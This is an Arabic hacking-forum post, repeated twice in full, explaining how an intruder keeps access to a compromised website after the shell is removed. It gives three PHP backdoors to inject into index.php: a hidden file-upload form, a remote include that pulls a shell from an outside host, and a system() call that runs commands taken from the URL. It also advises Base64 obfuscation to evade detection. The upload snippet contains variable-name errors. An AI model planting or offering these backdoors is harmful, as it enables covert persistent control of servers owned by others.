hacker@dz
05-09-2015, 12:33 AM
السلام عليكم
الكثير منا يعاني بعد اختراقه لسيرفر ما من أن يتم حذف الشل الخاص به و كما نعلم أن الشل هو سكريبت برمجي يسمح و يسهل عملية التحكم بالموقع المخترق أي التنقل , التعديل و الحذف .....
و بعد أن تريد اخترقه مجددا تجد أن الثغرة قد تم اقفالها !
+++++++++++++++++++++++
اذا ما الحل ؟
توجد العديد من الطرق لتلغيم الموقع لتتمكن من العودة اليه مجددا
+++++++++++++++++++++++
-أولا : مركز رفع خفي حيث نقوم بوضع المتغير id=dz و هو الذي يقوم باظهار مركز الرفع على الموقع , حيث نفترض أننا حقنا ملف index.php بالكود أسفله ليصبح الاستغلال هكذا : http://site.com/index.php?id=dz
الكود :
<?php
$id = $_GET['id'];
if($ids == 'dz'){
$anondz = $_FILES['file']['name'];
$anonymousdz = $_FILES['file']['tmp_name'];
echo "<form method='POST' enctype='multipart/form-data'>
<input type='file'name='file' />
<input type='submit' value='upload shell' />
</form>";
move_uploaded_file($anonymousdz,$anondzl);
}
?>
++++++++++++++++++++++
-ثانيا : استخدام دالة احضار ملفات خارجية , يعني أننا سوف نقوم باحضار ملف شل خارجي من موقع ما بمجرد وضع الرابط الخاص به
مثلا حقنا الكود في ملف index.php
http://site.com/index.php?id=http://black.com/shell.php
أي أننا نقوم برفع الشل برابط مباشر باسخدام المتغير
الكود :
<?php
$dz=$_GET['id'];
include $dz;
+++++++++++++++++++++++
-ثالثا : استخدام دالة تنفيذ الأوامر من خلال الدالة System
أي يمكننا هذا الكود من تنفيذ الأوامر على السيرفر , مثلا نحقن الملف index.php بالكود أسفله , فيمكن تنفيذ الأوامر هكذا :
http://site.com/index.php?dz=id
هكذا وضعنا الأمر id بعد المتغير "dz" طبعا id تعطينا صلاحياتنا على السيرفر
الكود :
<?php
$anonymous=$_GET['dz'];
system($anonymous);
?>
+++++++++++++++++++++++
ملاحظات :
-طبعا تلغيم الملفات باحدى هذه الأوامر يتم في ظل اختراقك للسيرفر و امتلاكك لشل عليه لتقوم بعملية اضافة الأكواد
- يتعين عليك تشفير الأكواد باستعمال خوارزميات Base64 لكي لا يتم كشفها حيث يمكنك ايجاد مواقع تقوم بالعمل
++++++++++++++++++++++++
أرجوا ان أكون قد أفتدكم
الكثير منا يعاني بعد اختراقه لسيرفر ما من أن يتم حذف الشل الخاص به و كما نعلم أن الشل هو سكريبت برمجي يسمح و يسهل عملية التحكم بالموقع المخترق أي التنقل , التعديل و الحذف .....
و بعد أن تريد اخترقه مجددا تجد أن الثغرة قد تم اقفالها !
+++++++++++++++++++++++
اذا ما الحل ؟
توجد العديد من الطرق لتلغيم الموقع لتتمكن من العودة اليه مجددا
+++++++++++++++++++++++
-أولا : مركز رفع خفي حيث نقوم بوضع المتغير id=dz و هو الذي يقوم باظهار مركز الرفع على الموقع , حيث نفترض أننا حقنا ملف index.php بالكود أسفله ليصبح الاستغلال هكذا : http://site.com/index.php?id=dz
الكود :
<?php
$id = $_GET['id'];
if($ids == 'dz'){
$anondz = $_FILES['file']['name'];
$anonymousdz = $_FILES['file']['tmp_name'];
echo "<form method='POST' enctype='multipart/form-data'>
<input type='file'name='file' />
<input type='submit' value='upload shell' />
</form>";
move_uploaded_file($anonymousdz,$anondzl);
}
?>
++++++++++++++++++++++
-ثانيا : استخدام دالة احضار ملفات خارجية , يعني أننا سوف نقوم باحضار ملف شل خارجي من موقع ما بمجرد وضع الرابط الخاص به
مثلا حقنا الكود في ملف index.php
http://site.com/index.php?id=http://black.com/shell.php
أي أننا نقوم برفع الشل برابط مباشر باسخدام المتغير
الكود :
<?php
$dz=$_GET['id'];
include $dz;
+++++++++++++++++++++++
-ثالثا : استخدام دالة تنفيذ الأوامر من خلال الدالة System
أي يمكننا هذا الكود من تنفيذ الأوامر على السيرفر , مثلا نحقن الملف index.php بالكود أسفله , فيمكن تنفيذ الأوامر هكذا :
http://site.com/index.php?dz=id
هكذا وضعنا الأمر id بعد المتغير "dz" طبعا id تعطينا صلاحياتنا على السيرفر
الكود :
<?php
$anonymous=$_GET['dz'];
system($anonymous);
?>
+++++++++++++++++++++++
ملاحظات :
-طبعا تلغيم الملفات باحدى هذه الأوامر يتم في ظل اختراقك للسيرفر و امتلاكك لشل عليه لتقوم بعملية اضافة الأكواد
- يتعين عليك تشفير الأكواد باستعمال خوارزميات Base64 لكي لا يتم كشفها حيث يمكنك ايجاد مواقع تقوم بالعمل
++++++++++++++++++++++++
أرجوا ان أكون قد أفتدكم